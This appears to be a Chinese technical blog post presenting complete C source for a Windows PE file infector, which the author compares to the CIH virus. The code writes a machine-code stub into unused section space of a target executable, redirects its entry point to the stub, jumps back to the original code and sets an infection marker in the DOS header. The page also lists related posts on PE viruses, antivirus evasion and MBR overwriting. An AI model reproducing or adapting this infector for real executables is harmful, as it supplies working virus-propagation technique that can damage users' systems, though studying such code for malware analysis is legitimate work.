简单感染PE文件

最新推荐文章于 2023-01-11 21:56:26 发布
最新推荐文章于 2023-01-11 21:56:26 发布
阅读量2.7k 收藏 1
点赞数 2
分类专栏: C/C++ PE文件 文章标签: 病毒 c语言 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19459853/article/details/50676272
版权

这个感染方式和win9x时代的CIH病毒感染方式很像。。。

@PandaOS
这个程序的感染标识放在了DOS头中。。。因为DOS头只有MZ和最后一个指向PE头的指针很重要,改了就完蛋了。。。别的几乎用不到
所以修改DOS头的话,只要不修改首尾字段,几乎不会影响程序的运行。
源程序

感染后的

感染前程序的入口

感染后程序的入口

只要搜索节中的空隙,然后将代码分成几块,分别插入进去,运行的时候再用jmp链接起来,就可以实现被感染的文件与源文件的大小相同。因为PE文件会有很多的空隙。如果一个地方的空隙很大,比你要插入的代码都大,你可以直接插入进去了。。。(大小相同并不是对所有可执行文件而言的!)
写的很烂,大神勿喷

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define pause system("pause")
int FPeFile(char *PeFileName)
{
	HANDLE hFile;
	HANDLE hMap;
	PIMAGE_DOS_HEADER pDosHeader;
	PIMAGE_NT_HEADERS pNtHeader;
	PIMAGE_SECTION_HEADER pSec;
	PIMAGE_OPTIONAL_HEADER pOptionalHeader;
	DWORD word=0;
	char *pBuf;
	short Sec;
	int size;
	unsigned char INT3=0xcc;
	unsigned char retn=0xc3;
	unsigned char Nop=0x90;
	hFile=CreateFileA(
		PeFileName,
		GENERIC_READ|
		GENERIC_WRITE,
		FILE_SHARE_READ|
		FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);
	if(hFile==INVALID_HANDLE_VALUE)
	{
		printf("打开文件失败!错误号:%d\n",GetLastError());
		pause;
		return 0;
	}
	size=GetFileSize(hFile,0);
	hMap=CreateFileMappingA(
		hFile,
		NULL,
		PAGE_READWRITE,
		0,
		size,
		NULL);
	if(hMap==INVALID_HANDLE_VALUE)
	{
Err:
		CloseHandle(hFile);
		printf("映射文件失败!\n");
		pause;
		return 0;
	}
	pBuf=(char*)MapViewOfFile(hMap,
		FILE_MAP_WRITE|
		FILE_MAP_READ,
		0,
		0,
		size);
	if(!pBuf)
	{
		CloseHandle(hFile);
		goto Err;
	}
	pDosHeader=(PIMAGE_DOS_HEADER)pBuf;
	pNtHeader=(PIMAGE_NT_HEADERS)&pBuf[pDosHeader->e_lfanew];
	pOptionalHeader=(PIMAGE_OPTIONAL_HEADER)&pNtHeader->OptionalHeader;
	if(pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
	{
NotPe:
		printf("不是有效的PE文件!\n");
		goto Clean;
	}
	if(pNtHeader->Signature!=IMAGE_NT_SIGNATURE)
		goto NotPe;
	if(pDosHeader->e_ovno==0x2308)
	{
		/* 已经被感染了 */
		printf("这个程序已经被感染了!\n");
		goto Clean;
	}
	Sec=pNtHeader->FileHeader.NumberOfSections;
	pSec=(PIMAGE_SECTION_HEADER)&pBuf[sizeof(IMAGE_NT_HEADERS)+pDosHeader->
		e_lfanew];
	for(int i=0;i<Sec;i++)
	{
		DWORD Empty;/* 空白字节大小 */
		DWORD py;/* 文件偏移 */
		DWORD VAddress;/* 相对虚拟地址 */
		DWORD OEP;/* 程序OEP */
		DWORD NOep;/* 感染后的程序的原OEP */
		unsigned char Jmp=0xE9;
		unsigned char Code[]=
		{0x60,0x33,0xC0,0x33,0xDB,0xEB,0x00,0x03,0xC3,
		0x83,0xC3,0x01,0x83,0xFB,0x65,0x75,0xF6,0x90,0x61};
		/* 收集信息 */
		Empty=pSec->SizeOfRawData-pSec->Misc.VirtualSize;
		py=pSec->PointerToRawData+pSec->Misc.VirtualSize;
		VAddress=pSec->VirtualAddress+pSec->Misc.VirtualSize;
		if(Empty<=0)
		{
			pSec++;
			continue;
		}
		if(Empty<(6+sizeof(Code)))
		{
			pSec++;
			continue;
		}
		OEP=pOptionalHeader->AddressOfEntryPoint;
		printf("区段名:%s\t文件偏移:%xH\t空白字节大小:%xH\t相对虚拟地址:%xH\n",pSec->Name,
			py,Empty,VAddress);
		/* 跳回源程序OEP */
		/* 在32位汇编中 Jmp指令偏移 = 要跳转的地址-(RVA+真实长度+插入的指令大小)-5 */
		NOep=OEP-(pSec->VirtualAddress+pSec->Misc.VirtualSize+sizeof(Code))-5;/* 获取感染后程序的OEP */
		pOptionalHeader->AddressOfEntryPoint=VAddress;
		SetFilePointer(hFile,py,NULL,FILE_BEGIN);
		/* 将信息写入到空白字节中 */
		if(WriteFile(hFile,Code,sizeof(Code),&word,NULL))
		{
			WriteFile(hFile,&Jmp,sizeof(Jmp),&word,NULL);
			WriteFile(hFile,&NOep,sizeof(NOep),&word,NULL);
			/* 标识 */
			WriteFile(hFile,&"yeeeee",sizeof("yeeeee"),&word,NULL);
			pDosHeader->e_ovno=0x2308;
			printf("源程序OEP:%xH\t感染后OEP:%xH\n",OEP,pOptionalHeader->AddressOfEntryPoint);
			break;
		}
		pSec++;
	}
	goto Clean;
Clean:
	UnmapViewOfFile(pBuf);
	CloseHandle(hMap);
	CloseHandle(hFile);
	pause;
	return 0;
}
int main(int argc,char *argv[])
{
	if(argc<2)
		return 0;
	FPeFile(argv[1]);
	return 0;
}


_KaQqi
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PE文件病毒示例程序
03-22
简单PE文件病毒示例
java收费钓鱼源码-Awesome-Pentest-Reference:一组很棒的渗透测试资源、工具和其他闪亮的东西
06-05
java收费直播源码令人敬畏的渗透测试 一组很棒的渗透测试资源。 是对计算机系统及其物理基础设施发起授权的模拟攻击以暴露潜在的安全弱点和漏洞的做法。 您的贡献和建议是衷心的 :heart_suit: 欢迎。 (✿◕‿◕)。 请查看更多详细信息。 这项工作是根据 . 内容 匿名工具 - 隐形互联网项目。 - 将所有流量从机器重定向到 Tor 网络的脚本。 - 通过查找 Tor 隐藏服务运营商引入的操作安全问题来调查暗网的工具。 - 免费软件和洋葱路由覆盖网络,可帮助您抵御流量分析。 - 全面的检测页面,用于测试您自己的 Web 浏览器的隐私和身份泄漏配置。 - 通过 Tor 压力测试工具拒绝服务的概念证明。 - 通过 Tor 为 Kali Linux OS 提供透明代理。 防病毒规避工具 - 包含针对 Windows 机器的可执行文件的后处理漏洞利用,以避免被防病毒软件识别。 - 创建任何在线网站的欺骗证书并签署可执行文件以逃避 AV 的工具。 - 32 位可移植可执行文件(“PE .exe s”)的运行时加密器。 - 动态 shellcode 注入工具,以及有史以来第一个真正的动态 PE 感染器。 - 简单
大白菜一键制作启动盘
06-04
大白菜PE u盘装系统U盘启动盘制作工具做到人人都会U盘装系统 ! U盘制作启动盘制作工具成功率几乎高达100%,试验过上百种U盘装系统,目前没有遇到一例使用大白菜导致u盘装系统失败。 U盘装系统的启动文件,是大白菜小组精心优化的系统,启动PE系统,是经过反复研究最终形成了真正万能u盘装系统! 有经验朋友都明白,不管是U盘启动还是光盘启动,最终是否可以引导u盘装系统.很大取决于PE或者DOS系统能否识别出来硬盘或者U盘,大白菜u盘装系统,整合了最全面的硬盘驱动,真正的硬盘识别全能王! u盘装系统软件功能: 1、真正的快速一键制作万能U盘启动,所有操作只需要点一下鼠标,操作极其方便简单,一键快速完成u盘装系统。 2、u盘启动系统集成大白菜精心制作和改良的PE系统,真正可以识别众多不同硬盘驱动PE系统,集成u盘装系统,硬盘数据恢复,密码破解,等等实用的程序。 3、自定义启动u盘装系统加载,只需在大白菜官网或其他网上找到各种功能的PE或者其他启动系统,只需要制作时添加一下,自动集成到启动u盘装系统中。 4、u盘装系统时U盘启动区自动隐藏,防病毒感染破坏,剩下的空间可以正常当U盘使用,无任何干挠!
计算机病毒与防护:文件修复原理.pptx
06-10
文件修复 文件修复 再某些时候当我们打开一个word文档时可能出现无法打开的情况,碰到这种情况很多人往往束手无策; 这时候就可以用UltraEdit来试着解决这个问题。 文件修复 用UltraEdit来打开损坏的文件,这时我们可以看到这个word文件并不是以D0CF11E0开头,并且开头处有“mz”字样; 可以判断这是一个捆绑文件。 捆绑文件 捆绑文件的原理:把两个文件捆绑在一起,当其中一个文件被运行时,另外一个文件也会被同时运行。 捆绑文件的检测方法:对于一个完整有效的PE文件或者是EXE文, 它里面都包含了几个绝对固定的特点,一是文件以MZ开头,跟着DOS头后面的PE头以PE\0\0开头。有了这两个特点,检测就变得很简单了。只需要利用UltraEdit一类工具打开木匾文件搜索关键字MZ或者PE,如果找到两个或两个以上,则说明这个文件一定是被捆绑了 感谢聆听
最新EXE感染代码。PE感染
08-31
仅限于技术交流。请勿做非法用图!!感染代码,PE感染
学习日记——(计算机病毒PE文件病毒
weixin_54055099的博客
11-22 6046
一、相关知识 PE文件病毒的原理:PE文件病毒感染病毒时,将自身代码复制到目标文件PE文件病毒在目标文件前运行,那么,它是怎么做到的呢? 答:PE病毒感染其他文件的常见方法是: 在文件中添加一个新节,然后把病毒代码和执行后返回宿主程序的代码写入到新添加的节中; 同时修改PE文件头的入口地址,使它指向新添加的病毒代码入口; 这样做后,当程序运行时,首先运行病毒代码,运行完后再转去运行宿主代码。 PE文件病毒感染过程: 第一种: 判断目标文件开始的两个字节是否为“MZ”; 判断PE文件
PE文件感染程序设计(PE病毒
Zyecho的博客
01-11 2471
记录PE病毒设计的入门实验
PE 文件病毒编写实验(一)
jmhIcoding
11-09 1万+
这个学期终于圆了当年来读渣电的网络安全专业的一个梦:PE病毒编写。想起了高中那会儿熬夜看看雪论坛瞎搞什么软件破解,可是搞到后面很多东西不理解做的不深入,所以就先一本心思的考上渣电,然后再来深入的学习一下PE的相关。后面 渣电是考上啦,网络安全专业也考上啦,可是大一到大三虽然偶然零零星星地看了一些PE相关的东西,却一直没有集中化的时间来研究PE,因为总是有其它项目找上自己。这个学期刚好有计算机病毒这门
EXP2 分析PE感染程序
zjlong668的博客
04-16 865
1.分析感染后的可执行程序 感染前和感染后对比: main-new.exe:最先传播病毒的exe文件,大小:3KB test.exe:感染目标,感染前大小:2.5KB test2.exe:感染后的exe文件感染后大小:6.5KB winhex打开这两个文件,利用相关功能分析(查看—>同步和比较) 感染前后文件不一样的地方就被winhex用黑色给标记出来了 一共有四处不一样: 感染前有3个节(00 03)感染后有4个节(00 04) 感染前时间戳为B...
浅析PE文件感染
Puzzle的专栏
05-15 1557
作 者: zyhfut 时 间: 2010-12-27,21:21:28 链 接: http://bbs.pediy.com/showthread.php?t=127202 PE文件感染,早已不是什么新鲜的话题。论坛中也有很多反复摧残PE文件的文章。这段时间在看病毒方面的知识,所以重新温习了下PE文件的结构,介绍PE结构的帖子很多,我就不详细介绍了,再介绍也不一定由牛人们介绍的详细。
感染PE文件示例源码(C++与汇编)
03-25
感染PE文件示例源码(C++与汇编编写)并提供使用示例
Virus-Learning:感染PE文件病毒学习过程
05-28
Virus-Learning 感染PE文件病毒学习过程 学习技术: 重定位 API函数地址的获取: 1)暴力搜内存中kernel32.dll基址 2)通过PEB获取kernel32.dll基址 感染PE文件 磁盘递归搜索技术 主要功能: 感染桌面上所有的exe后缀文件,使之弹出MessageBox,并继续运行原有程序 注意事项: 需要修改Desktop和sPath的路径为自己的桌面路径 如果感染开启了ASLR的文件只会执行感染代码而无法执行原程序,原因是OEP写入问题 使用MASM编写,编译使用MASMPLUS 使用暴力搜索内存寻找kernel32.dll基址的程序在WIN10上无法运行,因为WIN10有保护机制,会进入SEH
PE文件感染C++源代码
01-17
PE文件感染C++源代码 PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。 导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个节区,修改ImportAddress中的地址,使其指向新增加的节,这样,程序加载后,只要调用相关函数,就会先执行自己写的dll,执行完后,再跳转到原代码人口处执行。 导入地址感染。这个相对简单些,在PE文件头部分,IMAGE_OPTION_HEADER中有个ImportAddress目录,这个目录中只是一些jmp指令,我们可以修改jmp指令跳转的地址,使其指向在PE文件中我们新增加的代码。这需要在原PE文件中增加代码,PE文件在硬盘上默认200H字节对齐,一般存有空隙,如果代码量小,不用增加新节就可以插入代码。 修改入口函数地址。这个是最省事的办法,在原PE文件中新增加一个节,计算新节的RVA,然后修改入口代码,使其指向新增加的节。当然,如果.text节空隙足够大的话,不用添加新节也可以。 修改快捷方式文件。如果PE文件存在快捷方式,可以先行感染快捷方式,使快捷方式指向自己写的程序,自写程序启动后,再执行真正的PE文件。这种做法比较猥琐,而且不可靠。
PE文件感染 VC6.0 源码 PE结构
02-15
PE文件感染 VC6.0 源码 PE结构
C语言清空文件内容
热门推荐
_KaQqi的博客
11-22 2万+
C语言中清空文件的方法很简单。 只要以 可写 的方式打开文件,就能将这个文件清空
C/C++用户模式下改写硬盘主引导记录(MBR)
_KaQqi的博客
12-12 6641
CPU一共有四种权限级别:ring0 ring1 ring2 ring3 Windows只是用了ring0和ring3 我们在使用电脑时,一般在ring3模式下工作。在ring3模式下,我们无法使用CPU特权指令in和out。对系统所属的数据,地址空间以及硬件也是有严格的限制的。
C语言隐藏控制台窗口
_KaQqi的博客
12-12 5508
没有摘要
DLL劫持技术
_KaQqi的博客
01-18 4476
DLL劫持技术不想再说了,具体的可以百度。。。。 先简单的说一句。。。运行一个PE文件WINDOWS会首先在当前目录下寻找要用的DLL,如果找不到就上其他地方找,一直到系统目录。。。 然后想干嘛就干嘛了。。。 首先得伪造,别告诉我随便找个PE文件然后改一下名字就是伪造了。。。。 怎么伪造呢?当然是伪造导入表。
做了一个Dump exe文件的工具
_KaQqi的博客
07-30 4051
为了加深对PE文件的理解,以及和进程有关的WIN32 API的应用,就做出了这么一个东西。DUMP的话只需要DUMP出DOS头 + PE头 + 区块即可。 #include "stdafx.h" typedef struct { WORD e_magic; char Data[23 + sizeof(DWORD) * 3]; LONG e_lfanew; }Dos,*pDos; int
winhex编写pe文件
最新发布
01-28
winhex是一款十六进制编辑器和文件恢复工具,虽然它主要用于编辑和恢复文件,但也可以用来编写PE文件PE文件是一种Windows可执行文件格式,通常包括EXE和DLL文件。在winhex中编写PE文件需要对该文件格式有一定的了解。 首先,打开winhex并创建一个新的文件。然后,选择“编辑”菜单中的“插入”选项,以便插入PE文件的头部信息。在新的文件中,需要按照PE文件格式的规范依次填写文件头、可选头和节表等信息,确保文件的格式和结构是符合PE文件的标准。 接着,需要逐个添加节表,每个节表包括名称、虚拟大小、虚拟地址和物理地址等信息。这些信息在winhex中可以以十六进制的形式进行编辑和填写。同时,还需要在文件中添加导入表和导出表等PE文件所需的信息以确保文件的正常运行。 在编写PE文件的过程中,需要谨慎操作并确保每个部分的格式和信息都是正确的。一旦文件的结构和内容存在问题,那么文件可能无法被正确识别和执行。因此,在使用winhex编写PE文件时,需要对PE文件格式有一定的了解,并且要仔细检查每个部分的内容,以确保文件的正确性和可执行性。 总之,使用winhex可以编写PE文件,但需要对PE文件格式有一定的了解,并且需要仔细操作以确保文件的正确性。同时,也可以参考相关的文档和工具来辅助编写PE文件,以提高工作效率和准确性。 (300字)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值